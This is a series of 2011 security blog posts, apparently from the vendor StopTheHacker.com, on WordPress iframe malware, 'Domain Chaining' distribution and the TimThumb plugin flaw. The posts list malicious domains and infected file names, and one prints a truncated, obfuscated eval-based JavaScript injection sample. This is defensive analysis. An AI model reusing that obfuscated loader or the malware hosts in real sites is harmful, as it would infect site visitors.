The injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

Malware destination sites:

hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/

How did this happen?
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your usernames and passwords in your FTP client or other similar applications like FileZilla.

Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like TimThumb, are updated too.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security

Domain Chaining Attacks

October 17th, 2011

Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.

Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.

What is a Domain Chaining attack?
Domain Chaining attacks have been on the rise since the beginning of this year.

The basic concept is as follows:

  1. Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors’ computers or may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computer.
  2. As in traditional attacks, the malicious hackers use a network of compromised, but legitimate, websites in addition to the dedicated malware distribution websites they registered to widely spread their malware across the Internet.

Why do malicious hackers use this approach?
There are a few benefits to using this mechanism. The first is that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware, rather than only identifying the distribution points. Another “benefit” is what can be called “failover.”

We have blogged about hackers’ understanding of the necessity of failover in the past. If a security organization identifies a website in this malware chain as dangerous and manages to shut it down, the use of a number of websites as distribution points means the delivery of the actual exploit to website visitors does not stop. Think of it like a multi-headed Hydra.

How do I know if my site is infected?
If your website is part of this Domain Chaining attack, it will most likely have one of these files.

script.php
cssminibar.js
sidename.js
jtoolsmini.js
tempjs.js
js.php
jstools.js

What do these files do?
These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.

Maliciously registered sites related to this attack:

brkfnrmnk.co.cc
brlgnknc.co.cc

Maliciously registered sites related to previous Domain Chaining attacks:

klubnika34his.com
bogdantevye.ru
jwjmusic.cx.cc
frankieeus.ru
gaufridboris.ru
stephanos.ru

The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects Iframes and scripts to a maliciously registered website.

What script is used in the current attacks?
The latest version of this Domain Chaining attack uses the following script:

nbnjkl.com/urchin.js

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security

TimThumb Malware

August 30th, 2011

The ability to integrate useful third party plugins into a CMS like WordPress provides website owners the ability to add new functionality to existing websites. Unfortunately, this feature comes at a price.

Third party plugins often have security vulnerabilities that allow malicious hackers to break into websites and use them to distribute malware. We take a look at a plugin called TimThumb in this article.

What is TimThumb?
TimThumb is a small PHP script for cropping, zooming, and resizing images (jpg, png, gif) on the web. It is used widely on blogs and in other applications.

The Problem
The main script associated with TimThumb is called Timthumb.php. This program lets a website owner offer visitors the ability to load and resize images easily, while at the same time maintaining a cache of images to preserve bandwidth and speed up loading.

It is this functionality which has been a target of the zero-day TimThumb attack. TimThumb allows users to load pictures from external sites and store them in a directory on the web server, which is a really attractive vector for hackers to use in an attack. Keep in mind though, TimThumb does not play any part in executing malicious code. TimThumb is merely being used as a delivery mechanism for the malware.

Storing externally sourced content in a web server directory which is publicly accessible is the root cause of this issue. The verification mechanism for storage of content and verification of its source is flawed in TimThumb. This flawed mechanism has allowed malicious hackers to distribute malicious code from many websites.

A very good writeup on this topic is presented here.

Analysis
The malware runs each time the page is loaded by the website visitor’s browser. Malicious advertisements are displayed to the user and a malicious redirection may occur (sites we listed in our recent post).

  • A malicious script is often deposited in the cache directory (used by timthumb to store cached images)
    • The malicious scripts may be a c99/c100 shell
    • The malicious shells are web based – giving the malicious hacker remote control of your website, and hosting account
  • Base64-encoded malware is injected into wp-blog-header.php
  • JavaScript files may be modified (l10n.js and jquery.js are primary targets)

A sample of the injected code:

var _0x4ab4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63..
\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37..
eval (function (_0x2f46x1,_0x2f46x2

How do I protect my site?
StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security